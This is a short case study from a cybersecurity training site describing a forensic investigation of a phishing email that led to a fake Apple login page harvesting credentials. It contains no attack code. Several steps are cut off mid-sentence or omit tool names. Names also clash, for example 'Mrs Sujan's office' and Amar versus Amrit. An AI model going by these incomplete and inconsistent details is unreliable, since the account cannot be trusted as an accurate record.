CASE STUDY: Website Phishing Attack

December 9, 2015 | Views: 5494

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

1. Case Summary:
Mrs. Poornima Rai, working as a Social Media Strategist a firm called ‘Next Gen Digital System,’ received an email with promotional offer attached to it. She’s an intelligent person who always loved listening to music and dating books with coffee. She also has some knowledge about attacks through emails and their effect.

Mrs. Pinky Sharma, CEO of’ ‘Next Gen Digital System’ called up Mr. Amar Chhetri, a certified Computer Forensic Investigator and Expert and asked for his Forensic Services to perform an investigation to verify whether the email was a simple marketing promotion campaign and to start the legal actions with the help of Law and Enforcement Authority.


2. Forensic Methodology:
a. Amar Chhetri accepted the investigation task and visited Mrs Sujan’s office one working
b. He created bit-stream image of the folder on HDD that contains Outlook .pst files using FTK Imager.
c. He also created MD5 Hashes of the image to cross-check the integrity of the file during the
investigation and court-trial.
d. He moved the acquired image file into a folder protected and encrypted by TrueCrypt.
e. He prepared Chain-Of-Custody documents and stored the evidence in a forensically secure
f. Mr. Amar were requested to investigate the following evidences:
i. The nature of the site received in the email
ii. Behavior of the URL received
iii. Impacts of the programs inside the URL
g. He loaded the image file in FTK from password protected folder in TrueCrypt file and secured the
loaded contents with encryption and passcode inside it.
h. FTK search showed up the reported URL on the mail system loaded through the acquired evidence.
i. He verified the Phishing nature of URL using, but could not get any any
confirmatory details or site was not listed on Phishtank’s database.
j. He did a DNS analysis of the domain on the URL using and
k. He gathered the registrant details of the domain using SmartWhois and
l. He also gathered web hosting company details IPNetInfo
m. He decided to perform forensics analysis of source code in two modes- online and as the additional
acquired evidence.
n. He installed Firebug on Firefox and got some suspicious PHP and JavaScript codes on it.
o. Further, he installed HTTrack WebSite Copier and acquired the sources code as the additional
p. In detailed analysis, he found that the URL was programmed to collect username, password and
phone number from Apple users and to send them to programmed email address: .
q. He prepared a report using MS Word as well as FTK and concluded that URL was Phishing Site of
Apple and it has code with malicious intentions.


3. Trials and Prosecution:
Based on evidence prepared and produced, the registrant who himself had programmed the site was given punishment 3 years jail-terms under various IT Laws including misuse of electronic communication.

Researched and Authored by:
Amrit Chhetri, Principal IT Security Consultant, Certified Computer Forensics Investigator/Consultant, CPT, Social Media Consultant

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Awesome narrative.

  2. Nice write-up, interesting to see EH principles at work in the ‘real world’.

  3. Great {y}

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?